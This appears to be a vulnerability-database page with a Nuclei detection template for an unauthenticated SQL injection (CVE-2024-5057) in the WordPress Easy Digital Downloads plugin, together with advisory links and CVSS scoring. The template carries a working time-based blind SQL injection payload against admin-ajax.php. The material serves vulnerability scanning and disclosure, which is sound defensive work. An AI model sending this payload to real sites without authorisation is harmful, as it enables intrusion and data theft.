Lucene search
K

WordPress Easy Digital Downloads <= 3.2.12 - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

WordPress Easy Digital Downloads up to 3.2.12 has a SQL injection; update to 3.3.1 or later.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-5057
29 Aug 202417:03
circl
CNNVD
WordPress plugin Easy Digital Downloads SQL注入漏洞
29 Aug 202400:00
cnnvd
CVE
CVE-2024-5057
29 Aug 202414:04
cve
Cvelist
CVE-2024-5057 WordPress Easy Digital Downloads plugin <= 3.2.12 - SQL Injection vulnerability
29 Aug 202414:04
cvelist
EUVD
EUVD-2024-46321
3 Oct 202520:07
euvd
NVD
CVE-2024-5057
29 Aug 202414:15
nvd
OSV
CVE-2024-5057
29 Aug 202414:15
osv
Patchstack
WordPress Easy Digital Downloads Plugin <= 3.2.12 is vulnerable to SQL Injection
1 Aug 202400:00
patchstack
Patchstack
WordPress Easy Digital Downloads plugin <= 3.2.12 - SQL Injection vulnerability
1 Aug 202414:09
patchstack
Positive Technologies
PT-2024-34336
12 Aug 202400:00
ptsecurity
Rows per page
id: CVE-2024-5057

info:
  name: WordPress Easy Digital Downloads <= 3.2.12 - SQL Injection
  author: daffainfo
  severity: critical
  description: |
    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Easy Digital Downloads allows SQL Injection.This issue affects Easy Digital Downloads: from n/a through 3.2.12.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data leakage, data tampering, or full database compromise.
  remediation: |
    Update to the latest version of Easy Digital Downloads, at least version 3.3.1 or later.
  reference:
    - https://patchstack.com/database/vulnerability/easy-digital-downloads/wordpress-easy-digital-downloads-plugin-3-2-12-sql-injection-vulnerability?_s_id=cve
    - https://plugins.trac.wordpress.org/changeset/3120759/easy-digital-downloads/tags/3.3.1/src/Downloads/Search.php
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5057
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-5057
    epss-score: 0.02588
    epss-percentile: 0.83387
    cwe-id: CWE-89
    cpe: cpe:2.3:a:awesomemotive:easy_digital_downloads:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: awesomemotive
    product: easy_digital_downloads
    framework: wordpress
  tags: cve,cve2024,wordpress,wp,wp-plugin,awesomemotive,easy-digital-downloads,unauth,sqli,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/easy-digital-downloads/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Easy Digital Downloads")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 10s
        GET /wp-admin/admin-ajax.php?action=edd_download_search&s=a')/**/AND/**/SLEEP(6)%23 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 200'
          - 'contains(body, "[]")'
        condition: and
# digest: 4b0a00483046022100a8e6981f91fe9db79ad928fb693b59b8641fba695cc575dfd8e4a3dfd38cb272022100fca426f188f588bb349c5de7107d684bf614d185b31eaed0020a7ef990b5decf:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.3 - 9.8
EPSS0.02588
SSVC
16